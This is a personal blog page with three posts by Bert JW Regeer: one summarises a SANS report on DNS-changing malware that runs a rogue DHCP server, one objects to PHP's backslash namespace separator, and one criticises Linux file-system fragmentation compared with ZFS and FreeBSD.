Personal.X-Istence.com

Bert JW Regeer (畢傑龍)

Rogue DCHP servers -- Malware becomes more sophisticated

It has been a while since an idea that I have been floating around in my head has come true in the real world. Ever since I experimented with ettercap almost 2 years ago, I was wondering how long until we would see the idea of being able to beat a DHCP server in a race condition would be implemented on some wider scale to do phishing attacks on entire ISP's.

Luckily it is not as bad yet, however according to SANS Internet Storm Center there is a new DNS changing piece of Malware that installs a valid TCP/IP driver in Windows to have raw packet access, sets up a listener and emulates a DHCP server. Whenever it sees a DHCP request it replies with its own DHCP reply, hopefully before the real DHCP server gets a chance to do so, and sets the DNS resolver IP's to ones located in the Ukraine.

Very interesting, how secure are ISP's against these type of attacks? Could I set up a fake DHCP server on my outbound connection and reply to DHCP packets? Food for thought.

Rogue DHCP servers article at SANS

Namespace resolution in PHP has changed from :: to \

That is not a typo. The new way that PHP wants you to use namespaces is as follows:

namespace\class

Yeah, that is retarded, but it seems that it was decided over a length IRC discussion with a followup email to PHP internals.

There is already people blogging in protest of this change, which seems utterly backwards. \ is generally used to denote that the character following it has to be escaped, and as it stands and newcomers already have enough trouble as it is understanding the different escape sequences.

:: as the namespace resolution is engrained in my brain, mostly from C++, and \ would not work at all.

There is a wiki page for the "RFC" at http://wiki.php.net/rfc/namespaceseparator. This is going to slowly cause the death and decline of PHP.

In other news I am now looking for a new web programming language that is much like PHP, is able to do FastCGI, and have the FastCGI backend execute files the server hands it, without having something like the long-term running python processes where it is for one single app only.

Why all the fragmentation?

This is something that has bothered me about open source in general for a while now, why is that there is so much fragmentation? So many wheels that are being re-implemented for the sake of being re-implemented? I agree that a new file system that supports all the new features of btrFS and ZFS are required, at the same time I don't understand all of this duplication. ZFS has some features that btrFS does not have, and vice-versa, why not spend the time developing a hybrid of the two, thereby massively increasing the usability and stability of both products, or rather, of just one product since the time and effort would only be but into the hybrid.

If it is possible for Nvidia to use binary blobs for their graphics cards, it should be possible to use CDDL code with a compatibility shim in the Linux kernel. All this duplicated effort could instead be focused on one project, thereby having an all around better file system. btrFS has just recently started coming into fruition, would that time not be better spent improving ZFS?

It seems that license issues are the only thing that is causing all of this trouble in the first place. As a user of a system I don't want to spend valuable time testing all the various file systems, I also don't want to have to support all of the different file systems that are available. With a project as large as Linux, and the amount of file systems that are available, how can it be guaranteed that the file system I ultimately go with has been properly bug tested, has had the proper code review done, and is not going to be shoved aside for the next new shiny file system that is introduced? As an end-user (and I hereby don't mean the home user group) I want stability. FreeBSD gives me UFS2, I know I can depend on it, I know it will still exist tomorrow, and I know that it is still being looked at for performance improvements and improvements in general, ZFS has recently been imported and is will exist for a long time. OpenSolaris gives me UFS, and ZFS, I know it is going to be around, I know it is going to be improved. Linux gives me XFS, JFS, ext2, ext3, ext4, ReiserFS, Reiser4, and now btrFS. Depending on my workload and who I ask I get told to use different file systems on Linux. Individually testing each and everyone would be time consuming and error prone, instead of all of these different file systems make one unified file system.

For that reason, and that reason alone I use FreeBSD 7.0 and Solaris 10 on my servers. Stability is a good thing, I need some way to relay to my clients that there is a reasonable time schedule for new releases, that what they are storing their data on right now is going to be around tomorrow, and that it is stable, that it has been time proven and tested. Linux can not provide that at the moment.